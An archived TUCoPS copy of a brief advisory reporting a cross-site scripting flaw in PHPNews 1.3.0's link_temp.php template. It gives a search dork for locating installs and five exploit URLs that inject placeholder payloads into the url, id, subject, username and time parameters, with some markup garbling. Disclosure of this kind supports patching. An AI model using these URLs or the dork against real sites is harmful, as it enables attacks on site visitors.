TUCoPS :: Web :: PHP :: c07-1116.htm

PHPNews 1.3.0 XSS
PHPNews 1.3.0 XSS
PHPNews 1.3.0 XSS



PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net 
Found by: Detefix
dork: inurl:phpnews

-----

- Vulnerable Code:

$subject by $username on $time
----- - Exploits: [XSS">http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS] [XSS">http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS] http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH